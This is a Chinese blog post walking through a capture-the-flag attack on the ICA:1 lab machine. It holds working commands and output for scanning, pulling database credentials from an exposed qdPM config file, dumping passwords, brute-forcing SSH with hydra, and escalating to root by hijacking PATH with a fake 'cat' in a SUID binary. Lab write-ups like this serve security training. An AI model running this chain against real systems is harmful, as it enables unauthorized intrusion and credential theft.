ICA_1靶机渗透记录

althumi
于 2023-12-18 12:28:26 发布
阅读量530
点赞数 8
文章标签：网络安全内网渗透 ctf
本文链接：https://blog.csdn.net/althumi/article/details/135059823
版权
nmap -sP 10.80.56.0/24

主机：10.80.56.101
靶机：10.80.56.144

nmap -sS -sV -A -n 10.80.56.144

Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
|   256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_  256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp   open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open  mysql   MySQL 8.0.26
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after:  2031-09-23T10:47:29
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.26
|   Thread ID: 11
|   Capabilities flags: 65535
|   Some Capabilities: FoundRows, Support41Auth, SupportsCompression, ConnectWithDatabase, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, IgnoreSigpipes, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, LongPassword, InteractiveClient, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \x1CQ1\x04a   G7\x1D\x11(\x0B\x18y0:\x12a;I
|_  Auth Plugin Name: caching_sha2_password

#访问网页，信息没用
http://10.80.56.144

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

密码：.2uqPEfj3D<P'a-3

#扫描网站目录
dirsearch -u http://10.80.56.144

/backups                                   #备份文件目录
/check.php
/index.php                                 #qdPM登录页面，登录校验post:http://10.80.56.144/index.php/login
/install/index.php?upgrade/
/install                                        #数据库配置页面
/manual/index.html                   #手册页面
/readme.txt                                #信息
/robots.txt                                 #爬虫协议文件，没有可用信息
/template                           
/uploads/                                  #上传目录

qdPM
open source project management software written in symfony framework
http://qdpm.net

INSTALLATION
qdPM is web-based application and it means you have to have web-server.
Simply go to your qdPM web directory and use installer

SUPPORT
Contact me (support@qdpm.net) if you have any questions, suggestions or feedback about qdPM. 
My name is Sergey. I always reply to emails within 24-48 hours.

Thanks for downloading and using qdPM open-source solution!

#qdpm登录框架，使用searchsploit查看是否存在漏洞
searchsploit qdpm 9.2
#获得信息，访问yml文件下载
The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download. 

http://10.80.56.144/core/config/databases.yml

#获取mysql账户以及密码
all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true  
#登录msql
mysql -uqdpmadmin -h 10.80.56.144 -pUcVQCMQk2STVeS6J

show databases;

use qdpm;

use staff;

#没有邮箱，不是网站登录用户，staff意为成员，可能是本机用户
+------+---------------+--------+---------------------------+
| id   | department_id | name   | role                      |
+------+---------------+--------+---------------------------+
|    1 |             1 | Smith  | Cyber Security Specialist |
|    2 |             2 | Lucas  | Computer Engineer         |
|    3 |             1 | Travis | Intelligence Specialist   |
|    4 |             1 | Dexter | Cyber Security Analyst    |
|    5 |             2 | Meyer  | Genetic Engineer          |
+------+---------------+--------+---------------------------+

+------+---------+--------------------------+
| id   | user_id | password                 |
+------+---------+--------------------------+
|    1 |       2 | c3VSSkFkR3dMcDhkeTNyRg== |
|    2 |       4 | N1p3VjRxdGc0MmNtVVhHWA== |
|    3 |       1 | WDdNUWtQM1cyOWZld0hkQw== |
|    4 |       3 | REpjZVZ5OThXMjhZN3dMZw== |
|    5 |       5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+

+------+----------+
| id   | name     |
+------+----------+
|    1 | Agent    |
|    2 | Engineer |
+------+----------+

#用户名字典
Smith
Lucas
Travis
Dexter
Meyer
#密码字典
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
#九头蛇爆破靶机用户，得到两个结果
hydra -L user.txt -P pass.txt ssh://10.80.56.144

[22][ssh] host: 10.80.56.144   login: travis   password: DJceVy98W28Y7wLg
[22][ssh] host: 10.80.56.144   login: dexter   password: 7ZwV4qtg42cmUXGX
#登录travis获取第一个flag
ssh travis@10.80.56.144

ICA{Secret_Project}
#登录dexter获取提示
ssh dexter@10.80.56.144
#可能存在一个可执行性文件，可视的，可以进入系统
It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.
#查询权限4000的文件
find / -user root -perm -4000 -print 2>/dev/null 

/opt/get_access #和提示相符
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

#既然可视的，那么strings输出一下
strings /opt/get_access

#发现会执行一次cat
cat /root/system.info
#伪造一个cat文件，添加到环境变量
echo "/bin/bash" > /tmp/cat;export PATH=/tmp:$PATH;chmod +x /tmp/cat
#执行，提权成功
/opt/get_access

id
uid=0(root) gid=0(root) groups=0(root),1001(dexter)
#删除伪造的cat文件
rm /tmp/cat
#获取root的flag，通关
cat root.txt 
ICA{Next_Generation_Self_Renewable_Genetics}